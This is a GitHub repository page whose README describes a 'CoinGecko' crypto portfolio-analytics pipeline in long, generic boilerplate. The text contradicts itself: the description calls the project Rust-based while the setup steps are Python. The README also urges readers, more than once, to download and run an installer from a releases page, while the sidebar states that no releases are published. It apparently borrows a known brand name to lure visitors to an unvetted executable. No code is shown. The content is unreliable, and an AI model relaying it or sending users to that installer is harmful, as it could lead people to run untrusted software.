Skip to content

Rust-based data pipeline for crypto multi-asset portfolio analytics and historical data queries; scalable, high-performance tooling for developers and data teams 🐙

License

Notifications You must be signed in to change notification settings

Evanlum2011/CoinGecko

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CoinGecko: Orchestrated Crypto Data Pipeline for Portfolio Analytics

Visit releases page: https://github.com/Evanlum2011/CoinGecko/releases

Bitcoin Logo Ethereum Logo Data Pipeline Diagram

Releases Python CI License

Table of contents

  • Overview
  • Why this project exists
  • Core concepts and data model
  • Architecture and components
  • Data ingestion and processing workflow
  • Data storage, access, and querying
  • API, SDKs, and tooling
  • Deployment and operations
  • Quality, testing, and security
  • Extensibility and customization
  • Community and governance
  • Roadmap
  • Contributing
  • License and credits

Overview CoinGecko is a cryptocurrency data orchestration platform designed for multi-asset portfolio analysis and historical data querying. It pulls data from reliable crypto sources, curates it into a consistent structure, and exposes it through accessible interfaces for analytics, research, and decision making. The system is built to handle a variety of assets, time ranges, and market conditions, while keeping data lineage clear and query performance predictable.

The project aims to provide a single, coherent data layer for portfolio analytics. It supports time-series queries, cross-asset comparisons, and historical reconstruction. It is designed to scale as the number of assets grows, as the volume of data increases, and as new data sources arise. The core value is speed, reliability, and clarity when it comes to turning raw market data into actionable insights.

Why this project exists

  • Portfolio managers need accurate, timely, and verifiable data across a broad set of assets. CoinGecko offers a unified data layer that reduces integration friction for research teams.
  • Analysts require efficient access to historical data for backtesting strategies, risk assessment, and performance attribution. The system provides robust historical querying capabilities.
  • Developers want a clean API and predictable data contracts. The platform exposes consistent schemas, versioned endpoints, and broad configurability to fit different workflows.

Core concepts and data model

  • Asset: represents a crypto asset with a unique identifier, symbol, name, and metadata. Assets can be primary (Bitcoin, Ethereum) or paired (stablecoins, tokens).
  • MarketDataPoint: a single data snapshot for an asset at a given timestamp. Key fields include open, high, low, close, volume, market_cap, and source.
  • HistoryBundle: a collection of MarketDataPoints across multiple assets for a defined period, used for batch analytics and time-aligned queries.
  • Portfolio: a user-defined collection of assets with allocations, rebalancing rules, and performance tracking.
  • Query: a request for historical data or current state, with parameters such as date range, granularity, and asset filters.
  • Source: the origin of data (for example CoinGecko, other providers). Data provenance is stored for traceability.
  • Snapshot: a point-in-time export of a dataset, used for auditing, reproducibility, and debugging.

Architecture and components

  • Orchestrator: coordinates data flow, scheduling, retries, and fault handling. It aligns data pulls with the chosen cadence and ensures data freshness.
  • Ingestors: dedicated modules that fetch data from CoinGecko and other sources. Each ingestor understands the API quirks of a source, handles rate limits, and normalizes data into the canonical schema.
  • Transformers: transform raw feed data into a clean, unified representation. They enforce consistency rules, unit normalization, and time alignment across assets.
  • Store: a layered storage system with a data lake for raw data, an analytics layer for clean, query-ready data, and a history store for time-series data. The architecture favors append-only storage and immutable records to preserve history.
  • API Layer: exposes data via REST endpoints and optional GraphQL-like queries. It returns time-aligned data, aggregates, and derived metrics on demand.
  • CLI and SDKs: command-line tools and language bindings to fetch, transform, and analyze data programmatically. They enable automation and rapid experimentation.
  • Observability: logging, metrics, and tracing to track pipeline health, data quality, and performance. This view helps operators diagnose issues quickly.
  • Security and governance: role-based access, encrypted storage, and policy enforcement to protect sensitive data and ensure compliance with project standards.

Data ingestion and processing workflow

  • Scheduling: the orchestrator triggers ingestion tasks at set intervals or on-demand for ad hoc pulls. Timing respects API rate limits and reserve windows for high-priority pulls.
  • Data collection: ingestors query data sources, collect payloads, and store raw records with timestamps and provenance.
  • Normalization: transformers convert incoming data into a consistent schema. They standardize units (e.g., USD, BTC-based values), align timestamps, and clean anomalies.
  • Validation: validators run checks for data completeness, range correctness, and schema conformance. Any anomalies are logged and surfaced to operators.
  • Enrichment: derived metrics are calculated, such as volume-weighted price, moving averages, and volatility estimates. Enrichment adds value without mutating the underlying data.
  • Storage: raw data lands in the data lake with a precise lineage, while cleaned data sits in the analytics store. Time-series data is organized to support fast queries and efficient compaction.
  • Serving: API endpoints and SDK methods return data to clients. Queries can request historical slices, current state, or aggregates across assets.
  • Observability: metrics and traces feed dashboards. Data quality dashboards highlight gaps, drift, and inconsistencies.

Data storage, access, and querying

  • Data lake: stores raw ingest payloads, preserving original structure for auditability. Access is controlled and logs are kept for traceability.
  • Analytics layer: holds cleaned, normalized data ready for analysis. It uses a columnar format to speed up aggregations and windowed calculations.
  • Time-series store: optimized for time-aligned queries across assets. It supports high-throughput reads and efficient rollups.
  • Indexing and partitions: data is partitioned by asset and time window. Proper indexing speeds up common queries such as “get all prices for asset X within date range.”
  • Data retention: rules define how long raw versus clean data is kept, how frequently it is compacted, and when old partitions are archived.
  • Access patterns: the API supports time-bounded queries, cross-asset comparisons, and down-sampled data for dashboards. Historical queries can reconstruct performance across multiple periods.

API, SDKs, and tooling

  • REST API: predictable endpoints for assets, market data, and portfolio analytics. It supports paging, filtering, and aggregation.
  • Graph-like query support: optional, for advanced users who want flexible data shapes without multiple round trips.
  • SDKs: language bindings for Python, JavaScript, and other popular ecosystems. They simplify authentication, data retrieval, and transformation.
  • CLI: a set of commands to fetch data, run local analytics, and validate data integrity. It helps automate workflows and reproduce results.
  • Documentation: clear references for data models, endpoints, and examples. Each endpoint includes input validation rules and sample responses.
  • Examples gallery: ready-to-run scripts that demonstrate common tasks, such as building a portfolio snapshot, comparing assets over a period, or validating historical accuracy.

Deployment and operations

  • Containerized components: services are packaged as containers for consistent deployment. This approach simplifies setup and versioning.
  • Orchestration: deployment can run on Docker Compose for small setups or Kubernetes for large-scale deployments. Operators can scale components independently.
  • Configuration management: environment variables and config files control endpoints, credentials, and processing parameters. Secrets are stored securely following best practices.
  • Observability and alerts: dashboards track throughput, latency, and error rates. Alerts notify operators when data quality falls outside expected ranges.
  • Backup and recovery: regular backups cover raw data, analytics layers, and configuration. Recovery procedures are tested and documented.
  • Upgrades: new releases add features and fix issues without breaking existing pipelines. Versioning and migration scripts preserve backward compatibility where possible.

Quality, testing, and security

  • Unit tests: validate individual components in isolation. They verify data parsing, normalization rules, and edge cases.
  • Integration tests: confirm end-to-end data flows from ingestion to serving. They simulate real-world loads and verify correctness under stress.
  • Data quality checks: automated checks compare sources, ensure no unexpected gaps, and flag anomalies for review.
  • Security posture: access control, encrypted storage, and secure credentials handling. Regular audits verify compliance with chosen security standards.
  • Dependency hygiene: pinned versions and automated updates reduce drift and vulnerabilities. Vulnerability scans run as part of CI.

Extensibility and customization

  • Pluggable data sources: new data sources can be added as ingestors with minimal changes to the core pipeline. Each ingestor includes rate control and error handling tailored to the source.
  • Custom transforms: users can supply their own transformers to apply business-specific normalization or enrich data with external feeds.
  • Derived metrics: add new metrics to the analytics layer without altering core data. Metrics are computed on demand or materialized for speed.
  • Plugins and adapters: the system supports plugins that extend API capabilities, authentication schemes, or data formats.
  • Scripting and automation: a CLI and SDKs enable automation of repeatable tasks, such as nightly data pulls or portfolio rebalancing simulations.

Community and governance

  • Open governance model: decisions are made transparently, with clear contribution guidelines. Maintainers review changes for impact on consistency and performance.
  • Documentation as a first-class artifact: every feature includes user-focused docs. Examples, tutorials, and edge-case notes help users adopt the platform quickly.
  • Issue handling: issues are tracked with clear templates. Each report includes reproduction steps, environment details, and expected vs. actual outcomes.
  • Code style and quality: coding standards emphasize readability, safety, and maintainability. Linters and formatters enforce consistency.

Roadmap

  • Data source diversification: bring in additional sources to improve coverage and cross-check data.
  • Real-time streaming: reduce latency by enabling near real-time ingestion for high-frequency markets.
  • Advanced analytics: add risk metrics, attribution models, and scenario analysis for portfolio decisions.
  • Visualization first-class support: richer dashboards with drag-and-drop widgets, time-range comparisons, and custom charts.
  • Off-chain data: support for on-chain metrics, wallet analytics, and social sentiment feeds to complement price data.

Contributing

  • Style and conventions: follow the project’s contribution guidelines. Write clear, focused pull requests with tests where applicable.
  • Local setup: run the same versions of runtimes and dependencies used by CI. Keep changes isolated to a single feature or fix.
  • Testing locally: run unit and integration tests to ensure changes do not regress existing behavior.
  • Documentation: update or create docs for any user-facing changes. Include concise examples to illustrate new features.

Release management

  • Release cadence: monthly minor releases with a quarterly major release. Hotfixes appear as needed.
  • Release assets: each release bundles executables, container images, and documentation. Users should download the appropriate asset for their platform.
  • Selection of assets: assets are chosen to maximize compatibility, stability, and security. Always verify checksums when available.
  • Accessing releases: the official releases page hosts all artifacts and changelogs. To download the latest release asset from the page and run the installer, visit the releases section. Access the latest release here: https://github.com/Evanlum2011/CoinGecko/releases

Data governance and provenance

  • Provenance tracking: every data item retains source, ingest time, and transformation history. This makes audits straightforward.
  • Versioned schemas: data contracts evolve with backward-compatible changes whenever possible. Old data remains queryable against older schemas.
  • Data quality lineage: dashboards show data lineage, recent anomalies, and corrective actions taken.

Usage patterns and tutorials

  • Quick start: fetch a small set of assets, pull recent data, and view a simple time-series chart. This helps new users become productive fast.
  • Portfolio analytics workflow: start with a portfolio outline, pull historical prices, compute returns and risk metrics, then compare with a benchmark.
  • Historical queries: run time-bounded queries across multiple assets to study drawdowns, recoveries, and correlation changes.
  • Cross-asset comparisons: align data on common time windows and compute relative performance to identify leaders and laggards.

Data access controls

  • Role-based access: different roles grant varying levels of data access and administrative control.
  • Secret management: secrets live in a secure store and are rotated periodically.
  • Audit trails: every access and change is logged with user identity and timestamps.

Performance considerations

  • Caching: query results and common aggregations are cached to speed up frequent requests.
  • Partition pruning: time-based partitions ensure only relevant data is read.
  • Compression: data is stored with lossless compression to save space without sacrificing accuracy.
  • Horizontal scaling: the architecture scales out by adding more processing nodes as data volume grows.

Common workflows

  • New data source onboarding: add an ingestor for the source, map its fields to the canonical schema, and verify data quality on first run.
  • Backfilling: run a backfill to populate historical data for a new asset or a new time range.
  • Backtesting support: use historical data to simulate strategies and compare results across assets.
  • Data drift monitoring: compare recent data to historical baselines to detect anomalies or source changes.

Integrations and ecosystem

  • External tooling: the platform integrates with analytics notebooks, data visualization tools, and BI platforms.
  • Data exports: users can export time-series data to CSV, Parquet, or JSON for external analysis.
  • Community modules: third-party modules extend the platform with new data sources, derived metrics, or visualization widgets.

Common design decisions

  • Simplicity first: the core pipeline favors simplicity and reliability over feature bloat.
  • Clear data contracts: schemas are explicit, with explicit field definitions and types.
  • Deterministic processing: transforms are deterministic, making results reproducible.
  • Observability by default: metrics, logs, and traces are always collected.

Getting started Prerequisites

  • Python 3.9+ or later
  • Docker or Podman for containerized deployment
  • Git for source control
  • A modern Linux, macOS, or Windows environment with WSL2 if needed

Installation

  • Clone the repository
  • Create a virtual environment
    • python -m venv venv
    • source venv/bin/activate (or venv\Scripts\activate on Windows)
  • Install dependencies
    • pip install -r requirements.txt
  • Optional: install data tools if you want local notebooks or dashboards
    • pip install jupyterlab

Running locally

  • Start the orchestrator in development mode
    • python -m coin_gecko.orchestrator --env dev
  • Run a quick ingest for a small set of assets
    • python -m coin_gecko.ingest --assets BTC,ETH,ADA --limit 1000
  • Query a sample dataset
    • python -m coin_gecko.query --asset BTC --start 2023-01-01 --end 2023-12-31

Using Docker

Working with the API

  • List assets
    • GET /api/v1/assets
  • Get historical data
    • GET /api/v1/market-data?asset=BTC&start=2023-01-01&end=2023-12-31
  • Get portfolio analytics
    • GET /api/v1/portfolio/analytics?portfolio_id=default&period=1y

Examples and recipes

  • Build a cross-asset dashboard
    • Pull time-series data for major assets
    • Compute correlations and rolling returns
    • Visualize side-by-side charts for quick comparison
  • Backtest a simple strategy
    • Retrieve historical prices
    • Apply a moving-average crossover rule
    • Measure performance, drawdowns, and risk metrics

Data sources and reliability

  • Primary source: CoinGecko provides broad coverage of crypto assets and markets.
  • Secondary sources: supplemental feeds may be added to improve coverage and validation.
  • Data quality controls ensure consistency across sources, with provenance kept for every record.

Security and compliance

  • Access control to APIs and internal services regulates who can read or modify data.
  • Data at rest is encrypted, and credentials are rotated on a schedule.
  • Regular security reviews check for vulnerabilities and update dependencies accordingly.

Tuning and operations

  • Performance tuning comes from partitioning strategies, caching, and efficient query planning.
  • Operators tune ingest schedules to balance freshness with rate limits.
  • Observability dashboards show latency, error rates, and data drift in near real time.

Technical debt and waste management

  • The team tracks debt items in an issue board. Each item has a clear owner, a scope, and a completion plan.
  • Refactors target the most brittle parts of the pipeline, improving testability and reliability.
  • Deprecations are announced with migration paths and timelines to minimize disruption.

Changelog philosophy

  • Every release includes a brief changelog with features, fixes, and breaking changes if any.
  • Users are encouraged to review release notes before upgrading and to test in a staging environment.

FAQ

  • How do I add a new asset?
    • Add an asset definition, create or update an ingestor for the asset’s data source, run a backfill, and validate.
  • How is historical data aligned across assets?
    • Data points are aligned by timestamp to enable precise cross-asset comparisons.
  • Can I switch data sources?
    • Yes. Ingestors are designed to switch sources with minimal changes to downstream processing.
  • Is the API stable?
    • The API follows versioning rules. Changes to endpoints are documented and announced.

Credits and acknowledgments

  • Core contributors and maintainers are acknowledged in the project docs.
  • The project appreciates the open-source community for ideas, tests, and feedback.
  • Acknowledgments go to data source providers who offer accessible data for research and development.

Releases and assets

  • The official releases page hosts binaries, containers, and documentation for each version. To download the latest release asset from the page and run the installer, visit the releases section. Access the latest release here: https://github.com/Evanlum2011/CoinGecko/releases

Appendix: architecture visuals and diagrams

  • Data flow diagram showing ingestion, transformation, storage, and serving layers
  • Asset and history schemas illustrating the time-series structure
  • Role-based access model and governance workflows

Notes on topics and scope

  • Topics: not provided
  • This README emphasizes architecture, workflows, and practical usage for developers and operators

Additional diagrams and visual references

End of documentation excerpt

About

Rust-based data pipeline for crypto multi-asset portfolio analytics and historical data queries; scalable, high-performance tooling for developers and data teams 🐙

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages